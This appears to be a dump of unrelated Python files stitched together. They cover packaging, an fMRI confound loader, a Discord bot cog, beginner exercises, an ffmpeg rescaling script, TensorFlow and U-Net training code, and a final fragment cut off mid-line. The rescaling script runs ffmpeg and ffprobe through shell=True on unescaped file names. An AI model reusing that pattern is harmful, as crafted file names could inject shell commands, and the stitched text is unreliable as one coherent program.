Used algorithm!", # long_description=long_description, # long_description_content_type="text/markdown", # url="https://github.com/osscameroon/cacho", # packages=find_packages(), # package_data={ # 'cacho': ['./build/lib/cacho.so'], # }, # distclass=BinaryDistribution, # classifiers=[ # "Programming Language :: Python :: 3", # "License :: OSI Approved :: MIT License", # "Operating System :: OS Independent", # ], # python_requires='>=3.6', # ) setup( name='cacho', package_data={ 'cacho': ['./build/lib/cacho.so'], }, distclass=BinaryDistribution, version='0.0.7', author="Sanix-darker", author_email="", description="A tiny C++ in-memory cache system with Least recently Used algorithm!", long_description=long_description, long_description_content_type="text/markdown", url="https://github.com/osscameroon/cacho", classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], python_requires='>=3.5', )""" IS PALINDROME: Write a Python function that checks whether a passed in string is a palindrome or not. Note: A palindrome is a word, phrase, or sequence that reads the same backward as forward, e.g., madam or nurses run. 
""" s = input("Enter a sequence to check, if it's a palindrome.") char_group = [" ", "!", "?", ".", ","] s_new=s for symbol in char_group: s_new = s_new.replace("{}".format(symbol), "") if s_new.lower() == s_new[::-1].lower(): print("It's a palindrome!") print(s_new.lower()) else: print("It's not a palindrome!") if len(s_new) % 2 == 0: upper_range = len(s_new)//2 else: upper_range = len(s_new)//2 +1 for number in range(0, upper_range): if s_new.lower()[number] != s_new.lower()[-(number + 1)]: print(s_new.lower()) print("Difference between " + s_new.lower()[number] + " and " + s_new.lower()[-(number + 1)]) else: continue """Flexible method to load confounds generated by fMRIprep. Authors: , , , , , , . """ import warnings import pandas as pd from .load_confounds_utils import (_sanitize_confounds, _confounds_to_df, _prepare_output, MissingConfound) from . import load_confounds_components as components # Global variables listing the admissible types of noise components all_confounds = [ "motion", "high_pass", "wm_csf", "global_signal", "compcor", "ica_aroma", "scrub", "non_steady_state" ] # extra parameters needed for each noise component component_parameters = { "motion": ["motion"], "wm_csf": ["wm_csf"], "global_signal": ["global_signal"], "compcor": ["meta_json", "compcor", "n_compcor"], "ica_aroma": ["ica_aroma"], "scrub": ["scrub", "fd_threshold", "std_dvars_threshold"], } def _check_strategy(strategy): """Ensure the denoising strategies are valid.""" if (not isinstance(strategy, tuple)) and (not isinstance(strategy, list)): raise ValueError("strategy needs to be a tuple or list of strings" f" A {type(strategy)} was provided instead.") for conf in strategy: if conf == "non_steady_state": warnings.warn("Non-steady state volumes are always detected. It " "doesn't need to be supplied as part of the " "strategy. Supplying non_steady_state in strategy " "will not have additional effect.") if conf not in all_confounds: raise ValueError(f"{conf} is not a supported type of confounds.") # high pass filtering must be present if using fmriprep compcor outputs if ("compcor" in strategy) and ("high_pass" not in strategy): raise ValueError("When using compcor, `high_pass` must be included in " f"strategy. Current strategy: '{strategy}'") def _check_error(missing): """Consolidate a single error message across multiple missing confounds.""" if missing["confounds"] or missing["keywords"]: error_msg = ( "The following keywords or parameters are missing: " + f" {missing['confounds']}" + f" {missing['keywords']}" + ". You may want to try a different denoising strategy." ) raise ValueError(error_msg) def load_confounds(img_files, strategy=("motion", "high_pass", "wm_csf"), motion="full", scrub=5, fd_threshold=0.2, std_dvars_threshold=3, wm_csf="basic", global_signal="basic", compcor="anat_combined", n_compcor="all", ica_aroma="full", demean=True): """ Use confounds from :term:`fMRIPrep`. To enable easy confound variables loading from :term:`fMRIPrep` outputs, `load_confounds` provides an interface that groups subsets of confound variables into noise components and their parameters. It is possible to fine-tune a subset of noise components and their parameters through this function. The implementation will only support :term:`fMRIPrep` functional derivative directory from the 1.2.x series. The `compcor` noise component requires 1.4.x series or above. .. versionadded:: 0.8.2 Parameters ---------- img_files : path to processed image files, optionally as a list. 
Processed nii.gz/dtseries.nii/func.gii file reside in a :term:`fMRIPrep` generated functional derivative directory (i.e.The associated confound files should be in the same directory as the image file). As long as the image file, confound related tsv and json are in the same directory with BIDS-complied names, `load_confounds` can retrieve the relevant files correctly. - `nii.gz` or `dtseries.nii`: path to files, optionally as a list. - `func.gii`: list of a pair of paths to files, optionally as a list of lists. strategy : tuple or list of strings. Default ("motion", "high_pass", "wm_csf") The type of noise components to include. - "motion": head motion estimates. Associated parameter: `motion` - "wm_csf" confounds derived from white matter and cerebrospinal fluid. Associated parameter: `wm_csf` - "global_signal" confounds derived from the global signal. Associated parameter: `global_signal` - "compcor" confounds derived from CompCor :footcite:`BEHZADI200790`. When using this noise component, "high_pass" must also be applied. Associated parameter: `compcor`, `n_compcor` - "ica_aroma" confounds derived from ICA-AROMA :footcite:`Pruim2015`. Associated parameter: `ica_aroma` - "scrub" regressors for :footcite:`Power2014` scrubbing approach. Associated parameter: `scrub`, `fd_threshold`, `std_dvars_threshold` For each component above, associated parameters will be applied if specified. If associated parameters are not specified, any values supplied to the parameters are ignored. For example, `strategy=('motion', 'global_signal')` will allow users to supply input to associated parameter `motion` and `global_signal`; if users pass `wm_csf` parameter, it will not be applied as it is not part of the `strategy`. There are two additional noise components with no optional parameters. - "non_steady_state" denotes volumes collected before the :term:`fMRI` scanner has reached a stable state. - "high_pass" adds discrete cosines transformation basis regressors to handle low-frequency signal drifts. Non-steady-state volumes will always be checked. There's no need to supply this component to the strategy. motion : {'basic', 'power2', 'derivatives', 'full'} Type of confounds extracted from head motion estimates. - "basic" translation/rotation (6 parameters) - "power2" translation/rotation + quadratic terms (12 parameters) - "derivatives" translation/rotation + derivatives (12 parameters) - "full" translation/rotation + derivatives + quadratic terms + power2d derivatives (24 parameters) wm_csf : {'basic', 'power2', 'derivatives', 'full'} Type of confounds extracted from masks of white matter and cerebrospinal fluids. - "basic" the averages in each mask (2 parameters) - "power2" averages and quadratic terms (4 parameters) - "derivatives" averages and derivatives (4 parameters) - "full" averages + derivatives + quadratic terms + power2d derivatives (8 parameters) global_signal : {'basic', 'power2', 'derivatives', 'full'} Type of confounds extracted from the global signal. - "basic" just the global signal (1 parameter) - "power2" global signal and quadratic term (2 parameters) - "derivatives" global signal and derivative (2 parameters) - "full" global signal + derivatives + quadratic terms + power2d derivatives (4 parameters) scrub : int, default 5 After accounting for time frames with excessive motion, further remove segments shorter than the given number. The default value is 5 (referred as full scrubbing in :footcite:`Power2014`). 
When the value is 0, temove time frames based on excessive framewise displacement and DVARS only. One-hot encoding vectors are added as regressors for each scrubbed frame. fd_threshold : float, default 0.2 Framewise displacement threshold for scrub (default = 0.2 mm) std_dvars_threshold : float, default 3 Standardized DVARS threshold for scrub (default = 3). DVARs is defined as root mean squared intensity difference of volume N to volume N+1 :footcite:`Power2012`. D referring to temporal derivative of timecourses, VARS referring to root mean squared variance over voxels. compcor : {'anat_combined', 'anat_separated', 'temporal',\ 'temporal_anat_combined', 'temporal_anat_separated'} .. warning:: Require fmriprep >= v:1.4.0. Type of confounds extracted from a component based noise correction method :footcite:`BEHZADI200790`. - "anat_combined" noise components calculated using a white matter and CSF combined anatomical mask - "anat_separated" noise components calculated using white matter mask and CSF mask compcor separately; two sets of scores are concatenated - "temporal" noise components calculated using temporal compcor - "temporal_anat_combined" components of "temporal" and "anat_combined" - "temporal_anat_separated" components of "temporal" and "anat_separated" n_compcor : "all" or int, default "all" The number of noise components to be extracted. For acompcor_combined=False, and/or compcor="full", this is the number of components per mask. "all": select all components (50% variance explained by :term:`fMRIPrep` defaults) ica_aroma : {'full', 'basic'} - "full": use :term:`fMRIPrep` output `~desc-smoothAROMAnonaggr_bold.nii.gz`. - "basic": use noise independent components only. demean : boolean, default True If True, the confounds are standardized to a zero mean (over time). When using :class:`nilearn.input_data.NiftiMasker` with default parameters, the recommended option is True. When using :func:`nilearn.signal.clean` with default parameters, the recommended option is False. When `sample_mask` is not None, the mean is calculated on retained volumes. Returns ------- confounds : pandas.DataFrame, or list of A reduced version of :term:`fMRIPrep` confounds based on selected strategy and flags. An intercept is automatically added to the list of confounds. The columns contains the labels of the regressors. sample_mask : None, numpy.ndarray, or list of When no volumns require removal, the value is None. Otherwise, shape: (number of scans - number of volumes removed, ) The index of the niimgs along time/fourth dimension for valid volumes for subsequent analysis. This attribute should be passed to parameter `sample_mask` of :class:`nilearn.input_data.NiftiMasker` or :func:`nilearn.signal.clean`. Volumns are removed if flagged as following: - Non-steady-state volumes (if present) - Motion outliers detected by scrubbing Notes ----- The noise components implemented in this class are adapted from :footcite:`Ciric2017`. Band-pass filter is replaced by high-pass filter. Low-pass filters can be implemented, e.g., through `NifitMaskers`. Other aspects of the preprocessing listed in :footcite:`Ciric2017` are controlled through :term:`fMRIPrep`, e.g. distortion correction. See Also -------- :func:`nilearn.interfaces.fmriprep.load_confounds_strategy` References ----------- .. 
footbibliography:: """ _check_strategy(strategy) # load confounds per image provided img_files, flag_single = _sanitize_confounds(img_files) confounds_out = [] sample_mask_out = [] for file in img_files: sample_mask, conf = _load_single( file, strategy, demean, motion=motion, scrub=scrub, fd_threshold=fd_threshold, std_dvars_threshold=std_dvars_threshold, wm_csf=wm_csf, global_signal=global_signal, compcor=compcor, n_compcor=n_compcor, ica_aroma=ica_aroma) confounds_out.append(conf) sample_mask_out.append(sample_mask) # If a single input was provided, # send back a single output instead of a list if flag_single: confounds_out = confounds_out[0] sample_mask_out = sample_mask_out[0] return confounds_out, sample_mask_out def _load_single(confounds_raw, strategy, demean, **kargs): """Load confounds for a single image file.""" # Convert tsv file to pandas dataframe # check if relevant imaging files are present according to the strategy flag_acompcor = ("compcor" in strategy) and ( "anat" in kargs.get("compcor") ) flag_full_aroma = ("ica_aroma" in strategy) and ( kargs.get("ica_aroma") == "full" ) confounds_raw, meta_json = _confounds_to_df( confounds_raw, flag_acompcor, flag_full_aroma ) missing = {"confounds": [], "keywords": []} # always check non steady state volumes are loaded confounds, missing = _load_noise_component(confounds_raw, "non_steady_state", missing, meta_json=meta_json, **kargs) for component in strategy: loaded_confounds, missing = _load_noise_component( confounds_raw, component, missing, meta_json=meta_json, **kargs) confounds = pd.concat([confounds, loaded_confounds], axis=1) _check_error(missing) # raise any missing return _prepare_output(confounds, demean) def _load_noise_component(confounds_raw, component, missing, **kargs): """Load confound of a single noise component.""" try: need_params = component_parameters.get(component) if need_params: params = {param: kargs.get(param) for param in need_params} loaded_confounds = getattr(components, f"_load_{component}")( confounds_raw, **params) else: loaded_confounds = getattr(components, f"_load_{component}")( confounds_raw) except MissingConfound as exception: missing["confounds"] += exception.params missing["keywords"] += exception.keywords loaded_confounds = pd.DataFrame() return loaded_confounds, missing snow-blade/Botoneto0 import time import discord import psutil import os from datetime import datetime from discord.ext import commands from utils import default class Information(commands.Cog): def __init__(self, bot): self.bot = bot self.config = default.get("config.json") self.process = psutil.Process(os.getpid()) @commands.command() async def me(self, ctx): """Get info about your pitiful self in a dm""" if ctx.invoked_subcommand is None: findbots = sum(1 for member in ctx.guild.members if member.bot) embed = discord.Embed() if ctx.guild.icon: embed.set_thumbnail(url=ctx.guild.icon_url) if ctx.guild.banner: embed.set_image(url=ctx.guild.banner_url_as(format="png")) embed.add_field(name="Server Name", value=ctx.guild.name, inline=True) embed.add_field(name="Server ID", value=ctx.guild.id, inline=True) embed.add_field(name="Members", value=ctx.guild.member_count, inline=True) embed.add_field(name="Bots", value=findbots, inline=True) embed.add_field(name="Owner", value=ctx.guild.owner, inline=True) embed.add_field(name="Region", value=ctx.guild.region, inline=True) embed.add_field(name="Created", value=default.date(ctx.guild.created_at), inline=True) user=ctx.author if not user: return await ctx.send(f"Could not find any 
UserID matching **{user_id}**") try: await user.send(content="Server info",embed=embed) await ctx.send(f"✉️ Sent a DM to **{user.name}**") except discord.Forbidden: await ctx.send("This user might be having DMs blocked or it's a bot account...") @commands.command() async def ping(self, ctx): """ Pong! """ before = time.monotonic() before_ws = int(round(self.bot.latency * 1000, 1)) message = await ctx.send("🏓 Pong") ping = (time.monotonic() - before) * 1000 await message.edit(content=f"🏓 WS: {before_ws}ms | REST: {int(ping)}ms") @commands.command(aliases=['joinme', 'join', 'botinvite']) async def invite(self, ctx): """ Invite me to your server """ await ctx.send(f"**{ctx.author.name}**, use this URL to invite me\n<{discord.utils.oauth_url(self.bot.user.id)}>") @commands.command() async def source(self, ctx): """ Most of the code used here was from these tutorials so i have to give credits to the author """ """ Check out my source code <3 """ # Do not remove this command, this has to stay due to the GitHub LICENSE. # TL:DR, you have to disclose source according to MIT. # Reference: https://github.com/AlexFlipnote/discord_bot.py/blob/master/LICENSE await ctx.send(f"**{ctx.bot.user}** is powered by this source code:\nhttps://github.com/AlexFlipnote/discord_bot.py With modifications by user: snow-blade") @commands.command(aliases=['info', 'stats', 'status']) async def about(self, ctx): """ About the bot """ ramUsage = self.process.memory_full_info().rss / 1024**2 avgmembers = round(len(self.bot.users) / len(self.bot.guilds)) embedColour = discord.Embed.Empty if hasattr(ctx, 'guild') and ctx.guild is not None: embedColour = ctx.me.top_role.colour embed = discord.Embed(colour=embedColour) embed.set_thumbnail(url=ctx.bot.user.avatar_url) embed.add_field(name="Last boot", value=default.timeago(datetime.now() - self.bot.uptime), inline=True) embed.add_field( name=f"Developer", value=', '.join([str(self.bot.get_user(x)) for x in self.config.contributors]), inline=True) embed.add_field(name="Library", value="discord.py", inline=True) embed.add_field(name="Servers", value=f"{len(ctx.bot.guilds)} ( avg: {avgmembers} users/server )", inline=True) embed.add_field(name="Commands loaded", value=len([x.name for x in self.bot.commands]), inline=True) embed.add_field(name="RAM", value=f"{ramUsage:.2f} MB", inline=True) await ctx.send(content=f"ℹ About **Botoneto** , **{self.config.version}**", embed=embed) def setup(bot): bot.add_cog(Information(bot)) # In python we don't need to use variable declaration key words, we just go ahead and declare the variable first_name = input('Please enter your first name. ') last_name = input('Please enter your last name. ') middle_initial = input('Please enter your middle initial. ') # Prompt user for user's contact information... address = input('Please enter your address. ') email = input('Please enter your email. ') phone_number = input('Please enter your phone_number. ') # Print a separator. This wasn't part of the assignment, so it's okay if you # don't have this part. :) print('-' * 18) # Print everything to the console... print('Your first name is {0}'.format(first_name)) print('Your last name is {0}'.format(last_name)) print('Your middle initial is {0}'.format(middle_initial)) print('Your address is {0}'.format(address)) print('Your email is {0}'.format(email)) print('Your phone number is {0}'.format(phone_number)) # Print a separator. print('-' * 18) # Prompt for confirmation, and save what user entered. confirmation = input('Is this i\formation correct? 
(Y/n) ')Cyclip/pydb class UnknownCommand(Exception): pass class BadFormat(Exception): passimport argparse import os import subprocess import time import sys import ipdb import pickle from utils.meter import * def main(args): # Parameters from the args dir, h, w, fps, suffix = args.dir, args.height, args.width, args.fps, args.suffix # Video dir dir_split = dir.split('/') video_dir = dir_split[-1] root_dir = '/'.join(dir_split[:-1]) new_video_dir = "{}_{}x{}_{}".format(video_dir, w, h, fps) new_dir = os.path.join(root_dir, new_video_dir) os.makedirs(new_dir, exist_ok=True) # load the existing dict if exist dict_video_length_fn = os.path.join(new_dir, 'dict_id_length.pickle') if os.path.isfile(dict_video_length_fn): with open(dict_video_length_fn, 'rb') as file: dict_video_length = pickle.load(file) else: dict_video_length = {} # Get the initial video filenames list_video_fn = get_all_videos(dir, suffix) print("\n### Initial directory: {} ###".format(dir)) print("=> {} videos in total\n".format(len(list_video_fn))) # Loop over the super_video and extract op_time = AverageMeter() start = time.time() list_error_fn = [] for i, video_fn in enumerate(list_video_fn): try: # Rescale rescale_video(video_fn, w, h, fps, dir, new_dir, suffix, dict_video_length, ffmpeg=args.ffmpeg, crf=args.crf) # Log duration = time.time() - start op_time.update(duration, 1) time_done = get_time_to_print(op_time.avg * (i + 1)) time_remaining = get_time_to_print(op_time.avg * len(list_video_fn)) print('[{0}/{1}] : Time {batch_time.val:.3f} ({batch_time.avg:.3f}) [{done} => {remaining}]\t'.format( i + 1, len(list_video_fn), batch_time=op_time, done=time_done, remaining=time_remaining)) sys.stdout.flush() start = time.time() except: print("Impossible to rescale_videos super_video for {}".format(video_fn)) list_error_fn.append(video_fn) print("\nDone!") print("\nImpossible to rescale {} videos: \n {}".format(len(list_error_fn), list_error_fn)) # Save the dict id -> length with open(dict_video_length_fn, 'wb') as file: pickle.dump(dict_video_length, file, protocol=pickle.HIGHEST_PROTOCOL) print("\nLength of each video stored ---> {}".format(dict_video_length_fn)) # Print print("\n### You can now have access to your videos rescaled => {} ###\n".format(new_dir)) def get_duration(file): """Get the duration of a super_video using ffprobe. 
-> https://stackoverflow.com/questions/31024968/using-ffmpeg-to-obtain-super_video-durations-in-python""" cmd = 'ffprobe -i {} -show_entries format=duration -v quiet -of csv="p=0"'.format(file) output = subprocess.check_output( cmd, shell=True, # Let this run in the shell stderr=subprocess.STDOUT ) return float(output) def rescale_video(video_fn, w, h, fps, dir, new_dir, suffix, dict_video_length, ffmpeg, crf=17): """ Rescale a video according to its new width, height an fps """ # Output video_name video_id = video_fn.replace(dir, '').replace(suffix, '') video_fn_rescaled = video_fn.replace(dir, new_dir) video_fn_rescaled = video_fn_rescaled.replace(suffix, suffix.lower()) # Create the dir video_dir_to_create = '/'.join(video_fn_rescaled.split('/')[:-1]) os.makedirs(video_dir_to_create, exist_ok=True) # Check if the file already exists if os.path.isfile(video_fn_rescaled): print("{} already exists".format(video_fn_rescaled)) else: subprocess.call( '{ffmpeg} -i {video_input} -vf scale={w}:{h} -crf {crf} -r {fps} -y {video_output} -loglevel panic'.format( ffmpeg=ffmpeg, video_input=video_fn, h=h, w=w, fps=fps, video_output=video_fn_rescaled, crf=crf ), shell=True) # Get the duration of the new super_video (in sec) duration_sec = get_duration(video_fn_rescaled) duration_frames = int(duration_sec * fps) # update the dict id -> length dict_video_length[video_id] = duration_frames return video_fn_rescaled def get_all_videos(dir, extension='mp4'): """ Return a list of the videos filename from a directory and its subdirectories """ list_video_fn = [] for dirpath, dirnames, filenames in os.walk(dir): for filename in [f for f in filenames if f.endswith(extension)]: # Make sure it is not a hidden file if filename[0] != '.': fn = os.path.join(dirpath, filename) list_video_fn.append(fn) return list_video_fn if __name__ == '__main__': parser = argparse.ArgumentParser(description='Dataset preprocessing') parser.add_argument('--dir', metavar='DIR', default='../data/vlog/videos', help='Path to the videos dir') parser.add_argument('--width', default=256, type=int, metavar='W', help='Width of of the output videos') parser.add_argument('--height', default=256, type=int, metavar='H', help='Height of the output videos') parser.add_argument('--fps', default=30, type=int, metavar='FPS', help='Frames per second of the output video') parser.add_argument('--suffix', metavar='E', default='.mp4', help='Suffix of all the videos files - default version for the VLOG dataset') parser.add_argument('--crf', default=17, type=int, metavar='CRF', help='Quality of the compressing - lower is better (default: 17)') parser.add_argument('--ffmpeg', metavar='FF', default='ffmpeg', help='Path to your ffmpeg to use (default: ffmpeg)') args = parser.parse_args() main(args) henriquelino/pyrelay10-100 class ReskinPacket: def __init__(self): self.type = "RESKIN" self.skinID = 0 def write(self, writer): writer.writeInt32(self.skinID) def read(self, reader): self.skinID = reader.readerInt32() deepsentiment/deepsentiment """ Fine-tune a pre-trained Inception model by chopping off the last logits layer. 
""" import os import sys import numpy as np import tensorflow as tf from tensorflow.contrib import slim from tensorflow.contrib.slim.python.slim.learning import train_step from sklearn.linear_model import LogisticRegression from sklearn.ensemble import RandomForestClassifier from sklearn.metrics import accuracy_score from slim.preprocessing import inception_preprocessing #from slim.nets import inception from image_model import inception_v1 from datasets import dataset_utils from datasets.convert_to_dataset import get_split, get_split_with_text from datasets.convert_images_tfrecords import get_numpy_data # Seed for reproducibility _RANDOM_SEED = 0 _CONFIG = {'mode': 'train', 'dataset_dir': 'data', 'initial_lr': 1e-3, 'decay_factor': 0.3, 'batch_size': 64, 'final_endpoint': 'Mixed_5c'} def download_pretrained_model(url, checkpoint_dir): """Download pretrained inception model and store it in checkpoint_dir. Parameters: url: The url containing the compressed model. checkpoint_dir: The directory to save the model. """ if not tf.gfile.Exists(checkpoint_dir): tf.gfile.MakeDirs(checkpoint_dir) dataset_utils.download_and_uncompress_tarball(url, checkpoint_dir) def _load_batch(dataset, batch_size=32, shuffle=True, height=299, width=299, is_training=False): """Load a single batch of data. Args: dataset: The dataset to load. batch_size: The number of images in the batch. shuffle: Whether to shuffle the data sources and common queue when reading. height: The size of each image after preprocessing. width: The size of each image after preprocessing. is_training: Whether or not we're currently training or evaluating. Returns: images: A Tensor of size [batch_size, height, width, 3], image samples that have been preprocessed. images_raw: A Tensor of size [batch_size, height, width, 3], image samples that can be used for visualization. labels: A Tensor of size [batch_size], whose values range between 0 and dataset.num_classes. """ # For validation, if you set the common_queue_capacity to something lower than # batch_size, which is the validation size, then your output will contain duplicates. data_provider = slim.dataset_data_provider.DatasetDataProvider( dataset, shuffle=shuffle, common_queue_capacity=batch_size, common_queue_min=8) image_raw, label = data_provider.get(['image', 'label']) # Preprocess image for usage by Inception. image = inception_preprocessing.preprocess_image(image_raw, height, width, is_training=is_training) # Preprocess the image for display purposes. image_raw = tf.expand_dims(image_raw, 0) image_raw = tf.image.resize_images(image_raw, [height, width]) image_raw = tf.squeeze(image_raw) # Batch it up. images, images_raw, labels = tf.train.batch( [image, image_raw, label], batch_size=batch_size, num_threads=1, capacity=2 * batch_size) return images, images_raw, labels def load_batch_with_text(dataset, batch_size=32, shuffle=True, height=299, width=299, is_training=False): """Load a single batch of data. Args: dataset: The dataset to load. batch_size: The number of images in the batch. shuffle: Whether to shuffle the data sources and common queue when reading. height: The size of each image after preprocessing. width: The size of each image after preprocessing. is_training: Whether or not we're currently training or evaluating. Returns: images: A Tensor of size [batch_size, height, width, 3], image samples that have been preprocessed. images_raw: A Tensor of size [batch_size, height, width, 3], image samples that can be used for visualization. 
labels: A Tensor of size [batch_size], whose values range between 0 and dataset.num_classes. """ # For validation, if you set the common_queue_capacity to something lower than # batch_size, which is the validation size, then your output will contain duplicates. data_provider = slim.dataset_data_provider.DatasetDataProvider( dataset, shuffle=shuffle, common_queue_capacity=batch_size, common_queue_min=8) image_raw, text, seq_len, label, post_id, day = data_provider.get(['image', 'text', 'seq_len', 'label', 'post_id', 'day']) # Preprocess image for usage by Inception. image = inception_preprocessing.preprocess_image(image_raw, height, width, is_training=is_training) # Preprocess the image for display purposes. image_raw = tf.expand_dims(image_raw, 0) image_raw = tf.image.resize_images(image_raw, [height, width]) image_raw = tf.squeeze(image_raw) # Batch it up. images, images_raw, texts, seq_lens, labels, post_ids, days = tf.train.batch( [image, image_raw, text, seq_len, label, post_id, day], batch_size=batch_size, num_threads=1, capacity=2 * batch_size) return images, images_raw, texts, seq_lens, labels, post_ids, days def get_init_fn(checkpoints_dir, model_name='inception_v1.ckpt'): """Returns a function run by the chief worker to warm-start the training. """ checkpoint_exclude_scopes=["InceptionV1/Logits", "InceptionV1/AuxLogits"] exclusions = [scope.strip() for scope in checkpoint_exclude_scopes] variables_to_restore = [] for var in slim.get_model_variables(): excluded = False for exclusion in exclusions: if var.op.name.startswith(exclusion): excluded = True break if not excluded: variables_to_restore.append(var) return slim.assign_from_checkpoint_fn( os.path.join(checkpoints_dir, model_name), variables_to_restore) class ImageModel(): def __init__(self, config): self.config = config mode = config['mode'] dataset_dir = config['dataset_dir'] initial_lr = config['initial_lr'] batch_size = config['batch_size'] final_endpoint = config['final_endpoint'] tf.logging.set_verbosity(tf.logging.INFO) self.learning_rate = tf.Variable(initial_lr, trainable=False) self.lr_rate_placeholder = tf.placeholder(tf.float32) self.lr_rate_assign = self.learning_rate.assign(self.lr_rate_placeholder) self.dataset = get_split_with_text(mode, dataset_dir) image_size = inception_v1.default_image_size images, _, texts, seq_lens, self.labels = load_batch_with_text(self.dataset, batch_size, height=image_size, width=image_size) self.nb_emotions = self.dataset.num_classes # Create the model, use the default arg scope to configure the batch norm parameters. is_training = (mode == 'train') with slim.arg_scope(inception_v1.inception_v1_arg_scope()): self.logits, _ = inception_v1.inception_v1(images, final_endpoint=final_endpoint, num_classes=self.nb_emotions, is_training=is_training) def train_image_model(checkpoints_dir, train_dir, num_steps): """Fine tune the Image model, retraining Mixed_5c. Parameters: checkpoints_dir: The directory contained the pre-trained model. train_dir: The directory to save the trained model. num_steps: The number of steps training the model. 
""" if tf.gfile.Exists(train_dir): # Delete old model tf.gfile.DeleteRecursively(train_dir) tf.gfile.MakeDirs(train_dir) with tf.Graph().as_default(): model = ImageModel(_CONFIG) # Specify the loss function: one_hot_labels = slim.one_hot_encoding(model.labels, model.nb_emotions) slim.losses.softmax_cross_entropy(model.logits, one_hot_labels) total_loss = slim.losses.get_total_loss() # Create some summaries to visualize the training process # Use tensorboard --logdir=train_dir, careful with path (add Documents/tumblr-sentiment in front of train_dir) # Different from the logs, because computed on different mini batch of data tf.summary.scalar('Loss', total_loss) # Specify the optimizer and create the train op: optimizer = tf.train.AdamOptimizer(learning_rate=model.learning_rate) train_op = slim.learning.create_train_op(total_loss, optimizer) batch_size = _CONFIG['batch_size'] initial_lr = _CONFIG['initial_lr'] decay_factor = _CONFIG['decay_factor'] nb_batches = model.dataset.num_samples / batch_size def train_step_fn(session, *args, **kwargs): # Decaying learning rate every epoch if train_step_fn.step % (nb_batches) == 0: lr_decay = decay_factor ** train_step_fn.epoch session.run(model.lr_rate_assign, feed_dict={model.lr_rate_placeholder: initial_lr * lr_decay}) print('New learning rate: {0}'. format(initial_lr * lr_decay)) train_step_fn.epoch += 1 total_loss, should_stop = train_step(session, *args, **kwargs) #variables_to_print = ['InceptionV1/Conv2d_2b_1x1/weights:0', 'InceptionV1/Mixed_4b/Branch_3/Conv2d_0b_1x1/weights:0', # 'InceptionV1/Logits/Conv2d_0c_1x1/weights:0'] #for v in slim.get_model_variables(): # if v.name in variables_to_print: # print(v.name) # print(session.run(v)) # print('\n') #acc_valid = session.run(accuracy_valid) #print('Step {0}: loss: {1:.3f}, validation accuracy: {2:.3f}'.format(train_step_fn.step, total_loss, acc_valid)) #sys.stdout.flush() train_step_fn.step += 1 return [total_loss, should_stop] train_step_fn.step = 0 train_step_fn.epoch = 0 # Run the training: final_loss = slim.learning.train( train_op, logdir=train_dir, init_fn=get_init_fn(checkpoints_dir), save_interval_secs=600, save_summaries_secs=600, train_step_fn=train_step_fn, number_of_steps=num_steps) print('Finished training. Last batch loss {0:.3f}'.format(final_loss)) def evaluate_image_model(checkpoint_dir, log_dir, mode, num_evals): """Visualise results with: tensorboard --logdir=logdir. Now has train/validation curves on the same plot Parameters: checkpoint_dir: Checkpoint of the saved model during training. log_dir: Directory to save logs. mode: train or validation. num_evals: Number of batches to evaluate (mean of the batches is displayed). """ with tf.Graph().as_default(): _CONFIG['mode'] = mode model = ImageModel(_CONFIG) # Accuracy metrics accuracy = slim.metrics.streaming_accuracy(tf.cast(model.labels, tf.int32), tf.cast(tf.argmax(model.logits, 1), tf.int32)) # Choose the metrics to compute: names_to_values, names_to_updates = slim.metrics.aggregate_metric_map({ 'accuracy': accuracy, }) for metric_name, metric_value in names_to_values.iteritems(): tf.summary.scalar(metric_name, metric_value) log_dir = os.path.join(log_dir, mode) # Evaluate every eval_interval_secs secs or if not specified, # every time the checkpoint_dir changes # tf.get_variable variables are also restored slim.evaluation.evaluation_loop( '', checkpoint_dir, log_dir, num_evals=num_evals, eval_op=names_to_updates.values()) def softmax_regression(num_valid, C): """Run a softmax regression on the images. 
Parameters: num_valid: Size of the validation set. C: Inverse of the regularization strength. """ # Load data X_train, X_valid, y_train, y_valid = get_numpy_data('data', num_valid) logistic = LogisticRegression(multi_class='multinomial', solver='newton-cg', C=C, random_state=_RANDOM_SEED) print('Start training Logistic Regression.') logistic.fit(X_train, y_train) accuracy_train = accuracy_score(logistic.predict(X_train), y_train) valid_accuracy = accuracy_score(logistic.predict(X_valid), y_valid) print('Training accuracy: {0:.3f}'.format(accuracy_train)) print('Validation accuracy: {0:.3f}'.format(valid_accuracy)) def forest(num_valid, n_estimators, max_depth): """Run a Random Forest on the images. Parameters: num_valid: Size of the validation set. n_estimators: Number of trees. max_depth: Maximum depth of a tree. """ # Load data X_train, X_valid, y_train, y_valid = get_numpy_data('data', num_valid) forest = RandomForestClassifier(n_estimators=n_estimators, max_depth=max_depth, random_state=_RANDOM_SEED) print('Start training Random Forest.') forest.fit(X_train, y_train) accuracy_train = accuracy_score(forest.predict(X_train), y_train) valid_accuracy = accuracy_score(forest.predict(X_valid), y_valid) print('Training accuracy: {0:.3f}'.format(accuracy_train)) print('Validation accuracy: {0:.3f}'.format(valid_accuracy))1-10 import numpy as np import torch import torch.nn as nn from torch import optim import torch.nn.functional as F import tifffile from models import unet3d #from prep import target from matplotlib import pyplot as plt def random_slice(image, mask, size): ''' image: array Normalized image with CZYX dims mask: array Normalizes image with ZYX dims ''' nx = image.shape[-1] ny = image.shape[-2] nz = image.shape[1] nc = image.shape[0] px = size[2] py = size[1] pz = size[0] _x = np.random.randint(0, nx - px) _y = np.random.randint(0, ny - py) _z = np.random.randint(0, nz - pz) _bx = image[:,_z:_z+pz, _y:_y+py, _x:_x+px] _bx = _bx[np.newaxis] _bx = torch.from_numpy(_bx) _bm = mask[_z:_z+pz, _y:_y+py, _x:_x+px] _bm = _bm[np.newaxis] _bm = _bm[np.newaxis] _bm = torch.from_numpy(_bm) return _bx, _bm def get_one_mem(bs, image, mask): _bx = image[:,6:14, 100:228, 200:328] _bx = _bx[np.newaxis] _bx = torch.from_numpy(_bx) _bm = mask[6:14, 100:228, 200:328] _bm = _bm[np.newaxis] _bm = _bm[np.newaxis] _bm = torch.from_numpy(_bm) return _bx, _bm def get_batch(batchsize, image, mask): _xlist = list() _mlist = list() for i in range(batchsize): _x, _m = random_slice(image, mask, (8, 128, 128)) _xlist.append(_x) _mlist.append(_m) return torch.cat(_xlist), torch.cat(_mlist) def train(): image = tifffile.imread('/Users/cjw/DropBox/Work/3D/A.tif') mask = tifffile.imread('/Users/cjw/DropBox/Work/3D/Amask.tif') x = np.moveaxis(image, 1, 0) x = x[1:,:,:,:] xmin = x.min(axis=(1,2,3), keepdims=True) xmax = x.max(axis=(1,2,3), keepdims=True) x = (x - xmin)/(xmax - xmin) x = x.astype(np.float32) mask = 